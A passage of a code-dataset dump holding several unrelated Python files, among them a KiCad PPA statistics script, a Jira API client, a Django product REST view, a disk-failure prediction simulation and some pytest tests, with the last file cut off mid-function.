individualarchive.getDailyDownloadTotals()\n\n\n#PPAOWNER = \"js-reynaud\"\n#PPA = [\"kicad-5\", \"ppa-kicad\", \"kicad-dev-nightly\", \"kicad-4\", \"kicad-5.1\"]\nprint(\"PPA,Date,Date published,Status,Arch,Ubuntu version,Package name,Package version,Download count,Short version\")\nproduce(\"js-reynaud\", [\"kicad-5\", \"ppa-kicad\", \"kicad-dev-nightly\", \"kicad-4\"])\nproduce(\"kicad\", [\"kicad-dev-nightly\", \"kicad-5.1-releases\", \"kicad-6.0-releases\", \"kicad-7.0-releases\", \"kicad-7.0-nightly\"])\n","sub_path":"stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"79368021","text":"__author__ = \"Narwhale\"\n\nfrom core import auth\n\n# user_data = {\n#     'account_id':None,\n#     'is_authenticated':False,\n#     'account_data':None\n# }\ndef interactive():\n    '''\n    This function is the customer interaction module: it prints the menu options for the customer to choose from.\n    :return:\n    '''\n    
print('Hello!')\n\n\n\ndef run():\n    '''\n    This function runs the login/registration flow and then hands off to the customer interaction.\n    :return:\n    '''\n    select = '''\n--------Options---------\n    1. Log in\n    2. Register\n    '''\n    print(select)\n    user_select = input('Please enter your choice: ')\n    # map choices to handlers and call them directly instead of building strings for eval()\n    select_dict = {'1': auth.acc_login, '2': auth.acc_enroll}\n    if user_select in select_dict:\n        acc_data = select_dict[user_select]()\n        if acc_data:\n            interactive()\n    else:\n        print('Invalid choice')\n","sub_path":"编程/项目练习/ATM/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"63215145","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.2 (3180)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-armv6l/egg/barobo/demo/with_AutoConnect/setMotorPower2.py\n# Compiled at: 2014-09-16 14:39:13\nfrom barobo import Linkbot, Dongle\nimport time, sys, math\nif __name__ == '__main__':\n    if len(sys.argv) < 2:\n        print('Usage: {0} [Linkbot Serial ID]'.format(sys.argv[0]))\n        quit()\n    serialID = sys.argv[1]\n    dongle = Dongle()\n    dongle.connect()\n    linkbot = dongle.getLinkbot(serialID)\n    for i in range(0, 1000, 1):\n        linkbot.setBuzzerFrequency(int((math.sin(i / 100) + 1) * 1000))\n\n    linkbot.stop()","sub_path":"pycfiles/PyBarobo-0.1.18-py3.2-linux-armv6l/setMotorPower2.cpython-32.py","file_name":"setMotorPower2.cpython-32.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"540549804","text":"import requests\nimport json\nfrom jira_exception_handler import JiraExceptionHandler\nfrom jira_logger import JiraLogger\n\nclass JiraIssue:\n    \n    def __init__(self, jira_instance):\n        '''\n        retrieves createMeta fields\n        (editMeta fields are fetched per issue via _edit_meta)\n        '''\n        self._jira_instance = jira_instance\n        self._base_url = self._jira_instance.url\n        # the logger and exception handler must exist before _create_meta uses them\n        self._jira_logger = JiraLogger()\n        self._exception_handler = JiraExceptionHandler()\n        self._create_fields = self._create_meta()\n        self._edit_fields = None  # _edit_meta requires an issue key, so it cannot be called here\n    \n    \n    def _create_meta(self, project_ids=None, project_keys=None, issue_type_ids=None, issue_type_names=None):\n        '''\n        retrieves self._create_fields from /rest/api/2/issue/createmeta\n        '''\n        create_meta_url = '/rest/api/2/issue/createmeta'\n        request_data = {}\n        if project_ids:\n            request_data['projectIds'] = project_ids\n        if project_keys:\n            request_data['projectKeys'] = project_keys\n        if issue_type_ids:\n            request_data['issuetypeIds'] = issue_type_ids\n        if issue_type_names:\n            request_data['issuetypeNames'] = issue_type_names\n        resource_url = \"%s/%s\"%(self._base_url, create_meta_url)\n        request_json = json.dumps(request_data)\n        response = requests.get(resource_url, request_json)\n        status = response.status_code\n        text = response.text\n        self._jira_logger.log(status, text, request_json)\n        if status != 200:\n            self._exception_handler.raise_exception(status, text, request_json) \n        return response.json()\n    \n    \n    def _edit_meta(self, issue_key):\n        '''\n        retrieves the edit fields from /rest/api/2/issue/editmeta\n        '''\n        edit_meta_url = '/rest/api/2/issue/editmeta'\n        request_data = dict(issueIdOrKey=issue_key)\n        resource_url = \"%s/%s\"%(self._base_url, edit_meta_url)\n        request_json = json.dumps(request_data)\n        response = requests.get(resource_url, request_json)\n        status = response.status_code\n        text = response.text\n        self._jira_logger.log(status, text, request_json)\n        if status != 200:\n            self._exception_handler.raise_exception(status, text, 
request_json)\n        return response.json()\n    \n\n    \n    \n","sub_path":"jira/jira_issue.py","file_name":"jira_issue.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"534595685","text":"import sys\nimport pygame\nfrom pygame.locals import QUIT\nimport random\n\npygame.init()\nWIDTH = 640\nHEIGHT = 480\nWSIZE = (WIDTH, HEIGHT)\nsurface = pygame.display.set_mode( WSIZE )\npygame.display.set_caption( 'Squash' )\nclock = pygame.time.Clock()\nFPS = 2\n\nRED = (255,0,0)\nGREEN = (0,255,0)\nBLUE = (0,0,255)\nYELLOW = (255,255,0)\nMAGENTA = (255,0,255)\nCYAN = (0,255,255)\nWHITE = (255,255,255)\nBLACK = (0,0,0)\nCOLORS = [RED, GREEN, BLUE,\\\n          YELLOW, CYAN, MAGENTA, WHITE, BLACK]\n\nwhile True:\n    for event in pygame.event.get():\n        if event.type == QUIT:\n            pygame.quit()\n            sys.exit()\n    n = random.randint( 0, 7 )\n    surface.fill( COLORS[n] )\n    pygame.display.update()\n    clock.tick( FPS )\n","sub_path":"book2/programs/python/pg02.py","file_name":"pg02.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"301628093","text":"import matplotlib.dates as mdates\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\nclass RainfallSeries:\r\n    def __init__(self, db_tools):\r\n        self._db_tools = db_tools\r\n\r\n    def rainfall_serie(self, position):\r\n        result = self._db_tools.select_all(\r\n            \"SELECT read_dates.date_hour, precipitations.rainfall FROM public.read_dates, public.precipitations WHERE precipitations.read_date_id = read_dates.id AND precipitations.position_id = %s ORDER BY read_dates.date_hour ASC\",\r\n            (position,))\r\n\r\n        dates_series = []\r\n        values_series = []\r\n        for dt in result:\r\n            dates_series.append(dt[0])\r\n            values_series.append(dt[1])\r\n        return dates_series, values_series\r\n\r\n    def plot_graph(self, dates_series, values_series, r, c):\r\n        plt.clf()\r\n        plt.ylim((0, 1))\r\n        plt.plot(dates_series, values_series, linewidth=1)\r\n        plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%d-%m-%Y %H:%M'))\r\n        # plt.gca().xaxis.set_major_locator(mdates.HourLocator())\r\n        plt.xlabel('Date/Time')\r\n        plt.ylabel('Precipitation')\r\n        plt.title('Series')\r\n        plt.gcf().autofmt_xdate()\r\n        plt.grid()\r\n        # plt.show()\r\n        plt.savefig(\"graficos/serie_\" + str(r) + \"X\" + str(c) + \".png\")\r\n\r\n    def normalized(self, v):\r\n        norm = np.linalg.norm(v, ord=1)\r\n        if norm == 0:\r\n            norm = np.finfo(v.dtype).eps\r\n        return v / norm\r\n","sub_path":"rainfall_series.py","file_name":"rainfall_series.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"124926481","text":"import json\nfrom products.models import Category, Product\nfrom api.serializers import serialize_product_as_json\n\nfrom django.views.generic import View\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import get_list_or_404, get_object_or_404\n\n# complete the View below with all REST functionality\n\nclass ProductView(View):\n\n    def get(self, *args, **kwargs):\n        data = None\n\n        product_id = kwargs.get('product_id')\n        if product_id:\n            product = get_object_or_404(Product, id=product_id)\n            data = serialize_product_as_json(product)\n        else:\n            products = get_list_or_404(Product)\n            data = [serialize_product_as_json(product) for product in products]\n\n        return JsonResponse(data, status=200, safe=False)\n\n    def post(self, *args, 
**kwargs):\n        data = json.loads(self.request.body)\n        category_id = data.get('category', None)\n        category = get_object_or_404(Category, id=category_id)\n        product = Product.objects.create(\n            name=data.get('name'),\n            sku=data.get('sku'),\n            category=category,\n            description=data.get('description'),\n            price = data.get('price')\n        )\n        data = serialize_product_as_json(product)\n        return JsonResponse(data, status=201, safe=False)\n\n    def delete(self, *args, **kwargs):\n        product_id = kwargs.get('product_id')\n        product = get_object_or_404(Product, id=product_id)\n        product.delete()\n        data = {\"success\": True}\n        return JsonResponse(data, status=204, safe=False)\n\n    def patch(self, *args, **kwargs):\n        product_id = kwargs.get('product_id')\n        product = get_object_or_404(Product, id=product_id)\n        data = json.loads(self.request.body)\n\n        for field in ['name', 'category', 'sku', 'description', 'price', 'featured']:\n            if field not in data:\n                continue\n\n            if field == 'category':\n                data['category'] = get_object_or_404(Category, id=data.get('category'))\n\n            setattr(product, field, data[field])\n        product.save()\n\n        data = serialize_product_as_json(product)\n        return JsonResponse(data, status=200, safe=False)\n\n    def put(self, *args, **kwargs):\n        product_id = kwargs.get('product_id')\n        product = get_object_or_404(Product, id=product_id)\n        data = json.loads(self.request.body)\n\n        for field in ['name', 'category', 'sku', 'description', 'price', 'featured']:\n            if field not in data:\n                return JsonResponse({'success': False}, status=404)\n\n            if field == 'category':\n                data['category'] = get_object_or_404(Category, id=data.get('category'))\n\n            setattr(product, field, data[field])\n        product.save()\n\n        data = serialize_product_as_json(product)\n        return JsonResponse(data, status=200, safe=False)\n","sub_path":"ecommerce/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"285159207","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 22 19:35:47 2019\n\n@author: masudulhasanmasudb\n\"\"\"\nimport time\nimport glob,random\nimport datetime\nimport os\nimport subprocess\nimport shlex\nimport gc\nimport pandas as pd\nimport collections\nimport numpy as np\n#import seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn import ensemble, metrics \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom imblearn.over_sampling import (RandomOverSampler, SMOTE, ADASYN)\nfrom collections import Counter\nimport sys, traceback\nimport threading\n\n#disk_model_name = \"ST4000DM000\"\n#disk_model_name = \"ST8000DM002\"\n#disk_model_name = \"ST8000NM0055\"\ndisk_model_name = \"ST12000NM0007\"\n#disk_model_name = \"ST6000DX000\" //error\n#disk_model_name = \"ST10000NM0086\" //error\n\nnumber_of_days = 1\n\nmap_list = []\nindex_map ={}\ndate_dict={}\nnow = time.time()\ncount=-1\nfile_name=\"\"\nwith open(\"../map_2019.txt\",\"r\") as in_file:\n    for line in in_file:\n        if(len(line.strip())>0):\n            if\".csv\" in line:\n                if(count!=-1):\n                    # append a snapshot: date_dict is cleared and reused below, so\n                    # appending the dict itself would wipe the stored data\n                    map_list.append(dict(date_dict))\n                    index_map[file_name]=count\n                    \n                date_dict.clear()\n                count+=1\n                file_name=line.strip()\n            else:\n                parts = line.strip().split(\" \")\n                date_dict[parts[0]] = int(float(parts[1]))\n                \n#                print(line)\n            \n    \n# the loop above only stores a file when the next header appears, so store the last file here\nmap_list.append(dict(date_dict))\nindex_map[file_name] = count\n\nprint(count)\n\ndef perf_measure(y_actual, y_hat):\n    TP = 0\n    FP = 0\n    TN = 0\n    FN = 0\n\n    for 
i in range(len(y_hat)): \n if y_actual[i]==y_hat[i]==1:\n TP += 1\n if y_hat[i]==1 and y_actual[i]!=y_hat[i]:\n FP += 1\n if y_actual[i]==y_hat[i]==0:\n TN += 1\n if y_hat[i]==0 and y_actual[i]!=y_hat[i]:\n FN += 1\n \n return(TP, FP, TN, FN)\n\ndef count_unique(keys):\n uniq_keys = np.unique(keys)\n bins = uniq_keys.searchsorted(keys)\n return uniq_keys, np.bincount(bins)\n\n\ndef get_lable(serial_number_list,date,year,month,day):\n global parent_folder_name\n next_day_label =[]\n \n now = datetime.datetime(year,month,day)\n next_day = (now + datetime.timedelta(days=1)).strftime('%Y-%m-%d')\n \n for x in serial_number_list:\n index = index_map[x+\".csv\"]\n current_value = map_list[index][date]\n \n next_day_value = map_list[index][next_day]\n \n if(current_value==next_day_value):\n next_day_label.append(0)\n else:\n next_day_label.append(1)\n \n return next_day_label\n \n\ndef Sort_Tuple(tup): \n return(sorted(tup, key = lambda x: x[0], reverse = True))\n\n\ndef calculate_accuracy(tuple_list, real_list):\n threshold_list = [0.5, 0.45, 0.4, 0.35, 0.3, 0.25, 0.2, 0.15, 0.1, 0.05, 0.04, 0.03, 0.02, 0.01, 0.0]\n \n final_string=\"\"\n \n for base_threshold in threshold_list:\n tp=0 \n tn=0\n fp=0\n fn=0\n for x in range(len(tuple_list)):\n item = tuple_list[x]\n prob = float(item[0])\n# print(prob)\n# print(real_list[x])\n# print(item[1])\n# print(base_threshold)\n if prob >= base_threshold:\n if real_list[x]==1:\n tp+=1\n else:\n fp+=1\n else:\n if item[1]== 1 and real_list[x]==1:\n tp+=1\n elif item[1]== 0 and real_list[x]==1:\n fn+=1\n \n elif item[1]== 0 and real_list[x]==0:\n tn+=1\n elif item[1]== 1 and real_list[x]==0:\n fp+=1\n \n# print(\"TP, FP, TN, FN = \"+str(tp)+\" \"+str(fp)+\" \"+str(tn)+\" \"+str(fn))\n\n final_string+=\"\\n\\nThreshold \"+str(base_threshold)+\"\\n\"\n final_string+=\"TP, FP, TN, FN = \"+str(tp)+\" \"+str(fp)+\" \"+str(tn)+\" \"+str(fn)+\"\\n\"\n try:\n final_string+=\"Recall: \"+ str(tp/(tp+fn))+\"\\n\"\n except:\n final_string+=\"Recall: \"+ str(0)+\"\\n\"\n try:\n final_string+=\"extra: \"+ str((fp/(tn+fp))*100)+\"\\n\"\n except:\n final_string+=\"extra: \"+ str(0)+\"\\n\"\n return final_string\n \nselected_models = ['ST4000DM000', 'ST8000DM002', 'ST12000NM0007', 'ST8000NM0055', 'ST3000DM001', 'ST4000DX000']\n\nfor disk_model_name in selected_models:\n\n hdd = pd.read_csv(\"../final_dataset/\"+str(number_of_days)+'/'+str(disk_model_name)+'.csv', header=None)\n #hdd = pd.read_csv(\"../dataset_1.csv\")\n hdd = hdd.drop(hdd.columns[6], axis=1)\n hdd = hdd.drop(hdd.columns[9], axis=1)\n hdd = hdd.drop(hdd.columns[14], axis=1)\n hdd = hdd.drop(hdd.columns[13], axis=1)\n hdd = hdd.dropna()\n# print(hdd.head())\n \n hdd_extra = pd.read_csv(\"../2019_files/\"+str(number_of_days)+'/'+str(disk_model_name)+'.csv', header=None)\n# print(hdd_extra.head())\n hdd_extra = hdd_extra.drop(hdd_extra.columns[6], axis=1)\n hdd_extra = hdd_extra.drop(hdd_extra.columns[9], axis=1)\n hdd_extra = hdd_extra.drop(hdd_extra.columns[14], axis=1)\n hdd_extra = hdd_extra.drop(hdd_extra.columns[13], axis=1)\n hdd_extra = hdd_extra.dropna()\n \n hdd_merged = [hdd, hdd_extra]\n result = pd.concat(hdd_merged)\n# print(result.head())\n #result = result.dropna()\n \n x = result.iloc[:, :-1].values\n y = result.iloc[:, -1].values\n \n from imblearn.under_sampling import RandomUnderSampler\n rus = RandomUnderSampler()\n \n del hdd\n del hdd_extra\n del hdd_merged\n del result\n gc.collect()\n \n X_resampled, y_resampled = rus.fit_resample(x, y)\n print(Counter(y_resampled))\n# X_train, X_test, 
y_train, y_test = train_test_split(X_resampled, y_resampled, test_size=0.1, random_state=42)\n clf=RandomForestClassifier()\n clf.fit(X_resampled,y_resampled)\n \n \n features = [1, 4, 5, 7, 9, 12, 188, 193, 194, 197, 198, 199]\n columns_specified = []\n for feature in features:\n \tcolumns_specified += [\"smart_{0}_raw\".format(feature)]\n \n stripe_size = 50\n \n output_file = open(\"../result_log/\"+str(disk_model_name)+\".txt\",\"a+\")\n ##\n year = 2019\n end_year = 2019\n while year<=end_year: \n for month in range(7,8):\n for day in range(1,16):\n if month<=9:\n month_str = \"0\"+str(month)\n else:\n month_str = str(month)\n \n if day<=9:\n day_str = \"0\"+str(day)\n else:\n day_str = str(day)\n \n correctDate = None\n try:\n newDate = datetime.datetime(year,month,day)\n correctDate = True\n except ValueError:\n correctDate = False\n if correctDate==True:\n try:\n date = str(year)+\"-\"+month_str+\"-\"+day_str\n print(date)\n df = pd.read_csv(\"../data/\"+date+\".csv\")\n # df = df.loc[df['model'] == 'ST4000DM000']\n df = df.loc[df['model'] == str(disk_model_name)]\n df = df.loc[df['serial_number'] !=\"S300XQ5W\"]\n df = df.loc[df['serial_number'] !=\"W0Q7D8BD\"]\n df = df.loc[df['serial_number'] !=\"W3004WHH\"]\n shape = df.shape\n if shape[0]!=0:\n total_disk_number = 0\n total_check_disk = 0\n wl = np.random.poisson(lam=1.123983e+05)\n print(wl)\n output_str =\"\"\n for numof_iter in range(wl):\n try:\n s = np.random.uniform(0,1)\n if s>.9:\n file_size = np.random.poisson(lam=1.165580e+07)\n else:\n file_size = np.random.poisson(lam=2.082032e+01)\n \n output_str += \"\\n\\nfile size \"+ str(file_size)+\"\\n\"\n disk_number = int((file_size/1024)/50)+1\n \n if(disk_number> shape[0]):\n selected_disk = df\n total_disk_number+=shape[0]\n else:\n selected_disk = df.sample(disk_number)\n total_disk_number+=disk_number\n \n serial_number = selected_disk.iloc[:, 1].values\n selected_disk = selected_disk[columns_specified]\n pred_value = clf.predict(selected_disk)\n preds = clf.predict_proba(selected_disk)\n predicted_pair_list = []\n \n for x in range(len(preds[:,1])):\n predicted_pair_list.append((preds[:,1][x],pred_value[x]))\n \n # print(predicted_pair_list)\n \n # s_list = Sort_Tuple(predicted_pair_list)\n \n output_str+=str(date)+\"\\n\"\n # output_str+=\"predicted_value: \\n\"\n # output_str+=str(pred_value) + \"\\n\" \n next_day_label = get_lable(serial_number,date,year,month,day)\n \n # output_str+=\"next day real value: \\n\"\n # output_str+=str(next_day_label)+\"\\n\"\n \n output_str+=calculate_accuracy(predicted_pair_list, next_day_label)\n # c_auuracy, checksum_disk = calculate_accuracy(s_list, next_day_label)\n # total_check_disk+=int(checksum_disk)\n # \n # output_str += \"self calculated accuracy \"+ c_auuracy+\"\\n\"\n # output_str += \"cheksem run on \"+ checksum_disk +\"\\n\"\n # TP, FP, TN, FN = perf_measure(next_day_label, pred_value)\n # output_str+=\"next day stat: \\n\"\n # output_str+= str(metrics.accuracy_score(next_day_label, pred_value))+\"\\n\"\n # output_str+=str(metrics.recall_score(next_day_label, pred_value))+\"\\n\"\n # output_str+=\"TP: \"+str(TP)+\" \"+str(FP)+\" \"+str(TN)+\" \"+str(FN)+\"\\n\"\n \n except:\n # print(\"error\")\n traceback.print_exc()\n \n output_file.write(output_str)\n # output_file.write(\"total_disk \"+ str(total_disk_number) +\"\\n\")\n # output_file.write(\"check Sum run on \"+ str(total_check_disk) +\"\\n\")\n # output_file.write(\"perct \"+ str(total_check_disk/total_disk_number) +\"\\n\")\n output_file.flush()\n del(df)\n 
gc.collect()\n except:\n traceback.print_exc()\n \n \n year+=1 \n","sub_path":"scripts/simulation_wih_real_distribution.py","file_name":"simulation_wih_real_distribution.py","file_ext":"py","file_size_in_byte":12897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"137902613","text":"from dk_metric import image_metrics\nimport os\nfrom multiprocessing import Process, Lock, Manager\nimport numpy as np\nimport time\nimport sys\n\n'''python3 main.py gt_folder pre_folder output_folder [optional startt endt stepsize]'''\n\ngt_folder = sys.argv[1]\nprop_folder = sys.argv[2]\noutput_csv = os.path.join(sys.argv[3], 'scores.csv')\n\nstartt, endt, stepsize = 0.05, 0.95, 0.01\nif len(sys.argv) > 4:\n startt, endt, stepsize = list(map(float, sys.argv[4:]))\n\n\nradius = 3\nThread_Cnt = 16\nfiles = os.listdir(prop_folder)\nlock = Lock()\n\nALL_thresholds = []\nALL_precision, ALL_recall, ALL_F1, ALL_Jaccard, ALL_mod_prec, ALL_mod_recall, ALL_mod_F1 = [],[],[],[],[],[],[]\nmanager = Manager()\n\ndef cal_fp_tp(files, l, threshold):\n # sTP, sFP, sFN, msTP, msFP, msFN\n start_time = time.time()\n sTP, sFP, sFN, msTP, msFP, msFN = 0, 0, 0, 0, 0, 0\n for i, f in enumerate(files):\n gt_path = os.path.join(gt_folder, f.replace('_row', '_label'))\n prop_path = os.path.join(prop_folder, f)\n # gt_path = os.path.join(gt_folder, f)\n # prop_path = os.path.join(prop_folder, f)\n if i != 0 and i % 200 == 0:\n print(os.getpid(), i, 'th file... use', time.time() - start_time, 'seconds.')\n\n TP, FP, FN = image_metrics.get_TP_FP_FN(gt_path, prop_path, threshold=threshold)\n mTP, mFP, mFN = image_metrics.get_mod_TP_FP_FN(gt_path, prop_path, radius=radius, threshold=threshold)\n sTP += TP\n sFP += FP\n sFN += FN\n msTP += mTP\n msFP += mFP\n msFN += mFN\n with lock:\n l[0] += sTP\n l[1] += sFP\n l[2] += sFN\n l[3] += msTP\n l[4] += msFP\n l[5] += msFN\n\n\nthresholds = np.arange(startt, endt, stepsize).tolist()\nfor threshold in thresholds:\n ALL_thresholds.append(threshold)\n print('-------------', threshold, '-------------')\n threshold *= 255\n l = manager.list([0, 0, 0, 0, 0, 0])\n\n pool = []\n files_threads = np.array_split(files, Thread_Cnt)\n\n for i in range(Thread_Cnt):\n pool.append(Process(target=cal_fp_tp, args=(files_threads[i].tolist(), l, threshold,)))\n for t in pool:\n t.start()\n for t in pool:\n t.join()\n\n sTP, sFP, sFN, msTP, msFP, msFN = list(l)\n Precision = sTP / (sTP + sFP) if (sTP + sFP != 0) else 1\n Recall = sTP / (sTP + sFN) if(sTP + sFN != 0) else 1\n\n Jaccard = 1 / (1/Precision + 1/Recall - 1) if (Precision > 0 and Recall > 0) else 0\n F1 = 2 * Precision * Recall / (Precision + Recall) if (Precision > 0 and Recall > 0) else 0\n \n ALL_precision.append(Precision)\n ALL_recall.append(Recall)\n ALL_Jaccard.append(Jaccard)\n ALL_F1.append(F1)\n\n mPrecision = msTP / (msTP + msFP) if (msTP + msFP != 0) else 1\n mRecall = msTP / (msTP + msFN) if(msTP + msFN != 0) else 1\n mF1 = 2 * mPrecision * mRecall / (mPrecision + mRecall) if (mPrecision > 0 and mRecall > 0) else 0\n\n ALL_mod_prec.append(mPrecision)\n ALL_mod_recall.append(mRecall)\n ALL_mod_F1.append(mF1)\n \n\nwith open(output_csv, 'w') as output:\n data_thre = 'Threshold,' + ','.join(['{:.6f}'.format(v) for v in ALL_thresholds])\n data_pre = 'Precision,' + ','.join(['{:.6f}'.format(v) for v in ALL_precision])\n data_rec = 'Recall,' + ','.join(['{:.6f}'.format(v) for v in ALL_recall])\n data_jac = 'Jaccard,' + ','.join(['{:.6f}'.format(v) for v in ALL_Jaccard])\n data_f1 = 'F1,' + 
','.join(['{:.6f}'.format(v) for v in ALL_F1])\n data_mpre = 'Mod_Prec,' + ','.join(['{:.6f}'.format(v) for v in ALL_mod_prec])\n data_mrec = 'Mod_Rec,' + ','.join(['{:.6f}'.format(v) for v in ALL_mod_recall]) \n data_mf1 = 'Mod_F1,' + ','.join(['{:.6f}'.format(v) for v in ALL_mod_F1])\n output.write('\\n'.join([data_thre, data_pre, data_rec, data_jac, data_f1, data_mpre, data_mrec, data_mf1])) \n\n","sub_path":"ComputeScore/main_180405.py","file_name":"main_180405.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"183270871","text":"#! /usr/bin/env python\nfrom pandas import concat\nimport re\nimport sys, os\nfrom poplerGUI.logiclayer.datalayer import config as orm\nfrom poplerGUI.logiclayer import class_userfacade as face\nfrom poplerGUI.logiclayer import class_timeparse as tparse\nfrom poplerGUI.logiclayer.class_helpers import produce_null_df\nfrom poplerGUI.logiclayer import class_dictionarydataframe as ddf\n\ndef test_site_in_project_key(\n MergeToUpload, site_handle_corner_case, file_handle_corner_case,\n meta_handle_corner_case, project_handle_corner_case, taxa_handle_corner_case,\n time_handle_corner_case, count_handle_corner_case, covar_handle_corner_case):\n facade = face.Facade()\n\n facade.input_register(meta_handle_corner_case)\n facade.meta_verify()\n\n facade.input_register(file_handle_corner_case)\n facade.load_data()\n facade._data.replace({'-888': 'NA'}, inplace=True)\n\n \n facade.input_register(site_handle_corner_case)\n sitedirector = facade.make_table('siteinfo')\n study_site_table = sitedirector._availdf\n\n print('study_site_table (test): ', study_site_table)\n facade.create_log_record('study_site_table')\n lter = meta_handle_corner_case.lnedentry['lter']\n ltercol = produce_null_df(1, [\n 'lter_table_fkey'], len(study_site_table), lter)\n study_site_table = concat([study_site_table, ltercol], axis=1)\n print('study_site_table: ', study_site_table)\n facade.push_tables['study_site_table'] = study_site_table\n \n siteid = site_handle_corner_case.lnedentry['study_site_key']\n sitelevels = facade._data[\n siteid].drop_duplicates().values.tolist()\n facade.register_site_levels(sitelevels)\n facade._valueregister['siteid'] = siteid\n\n facade.input_register(project_handle_corner_case)\n maindirector = facade.make_table('maininfo')\n project_table = maindirector._availdf.copy().reset_index(drop=True)\n orm.convert_types(project_table, orm.project_types)\n \n facade.push_tables['project_table'] = project_table\n facade.create_log_record('project_table')\n \n facade.input_register(taxa_handle_corner_case)\n taxadirector = facade.make_table('taxainfo')\n taxa_table = taxadirector._availdf\n facade.push_tables['taxa_table'] = taxa_table\n facade.create_log_record('taxa_table')\n \n facade.input_register(time_handle_corner_case)\n timetable = tparse.TimeParse(\n facade._data, time_handle_corner_case.lnedentry).formater()\n facade.push_tables['timetable'] = timetable\n facade.create_log_record('timetable')\n\n facade.input_register(count_handle_corner_case)\n rawdirector = facade.make_table('rawinfo')\n rawtable = rawdirector._availdf\n print(rawtable)\n facade.push_tables[count_handle_corner_case.tablename] = rawtable\n facade.create_log_record(count_handle_corner_case.tablename)\n\n facade.input_register(covar_handle_corner_case)\n covartable = ddf.DictionaryDataframe(\n facade._data,\n covar_handle_corner_case.lnedentry['columns']).convert_records()\n 
facade.push_tables['covariates'] = covartable\n facade.create_log_record('covartable')\n\n facade._valueregister['globalid'] = meta_handle_corner_case.lnedentry['globalid']\n facade._valueregister['lter'] = meta_handle_corner_case.lnedentry['lter']\n facade._valueregister['siteid'] = siteid\n\n timetable_og_cols = timetable.columns.values.tolist()\n timetable.columns = [x+'_derived' for x in timetable_og_cols]\n observationdf = facade._data\n observation_time_df = concat([timetable,observationdf], axis=1)\n \n print('merge class obs_time columns: ', observation_time_df.columns)\n print('merge class project table: ', project_table)\n\n try:\n study_site_table.to_sql(\n 'study_site_table',\n orm.conn, if_exists='append', index=False)\n except Exception as e:\n print(str(e))\n\n project_table['lter_project_fkey'] = facade._valueregister['lter']\n project_table.to_sql(\n 'project_table', orm.conn,\n if_exists='append', index=False\n )\n\n merge_object = MergeToUpload()\n site_in_project_key_df = merge_object.site_in_proj_key_df(\n studysitetabledf=study_site_table,\n projecttabledf=project_table,\n observationtabledf=observation_time_df,\n lterlocation=facade._valueregister['lter'],\n studysitelabel=siteid,\n studysitelevels=sitelevels\n )\n\n merge_object.merge_for_taxa_table_upload(\n formated_taxa_table=taxa_table,\n siteinprojkeydf=site_in_project_key_df,\n sitelabel=siteid\n )\n\n taxa_column_in_data = [\n x[1] for x in \n list(facade._inputs['taxainfo'].lnedentry.items())\n ]\n\n taxa_column_in_push_table = [\n x[0] for x in \n list(facade._inputs['taxainfo'].lnedentry.items())\n ]\n\n merge_object.merge_for_datatype_table_upload(\n raw_dataframe=observation_time_df,\n formated_dataframe=rawtable,\n formated_dataframe_name=\n '{}'.format(\n re.sub('_table', '', facade._inputs['rawinfo'].tablename)),\n covariate_dataframe=covartable,\n siteinprojkeydf=site_in_project_key_df,\n raw_data_taxa_columns=taxa_column_in_data,\n uploaded_taxa_columns=taxa_column_in_push_table\n )\n obs_columns_in_data = [\n x[1] for x in \n list(facade._inputs['rawinfo'].lnedentry.items())\n ]\n obs_columns_in_push_table = [\n x[0] for x in \n list(facade._inputs['rawinfo'].lnedentry.items())\n ]\n merge_object.update_project_table(\n spatial_rep_columns_from_og_df=obs_columns_in_data,\n spatial_rep_columns_from_formated_df=obs_columns_in_push_table\n )\n\n","sub_path":"test/logiclayer/test_mergedtoupload_count.py","file_name":"test_mergedtoupload_count.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"224160472","text":"# -*- coding: utf-8 -*-\nimport allure\nimport pytest\nfrom bin.unit import Request, Assert, Log\nfrom flow.Getjson import get_data\n\n\n# class test_single(object):\n# def setup_class(self):\n# # log in, set up test data, etc.\n# print('test start')\n# pass\n#\n# def teardown_class(self):\n# # clean up data, log out, etc.\n# print('test end')\n# pass\n\n\n@pytest.mark.parametrize(\"url,method,body\", get_data())\n@allure.epic('CDN customer console API tests')\n@allure.feature('Single-endpoint tests')\ndef test_one(url, method, body):\n # file_list = walkfile('/testcases')\n allure.testcase(url)\n request = Request.Request()\n asset = Assert.Assert()\n # log = Log.Log()\n if method == 'POST':\n response = request.post_request(url, body)\n allure.step('API response: ' + str(response))\n assert response['code'] == '200'\n assert response['time_total'] < 3000\n asset.common_assert(response)\n # assert 1\n elif method == 'GET':\n response = request.get_request(url, body)\n 
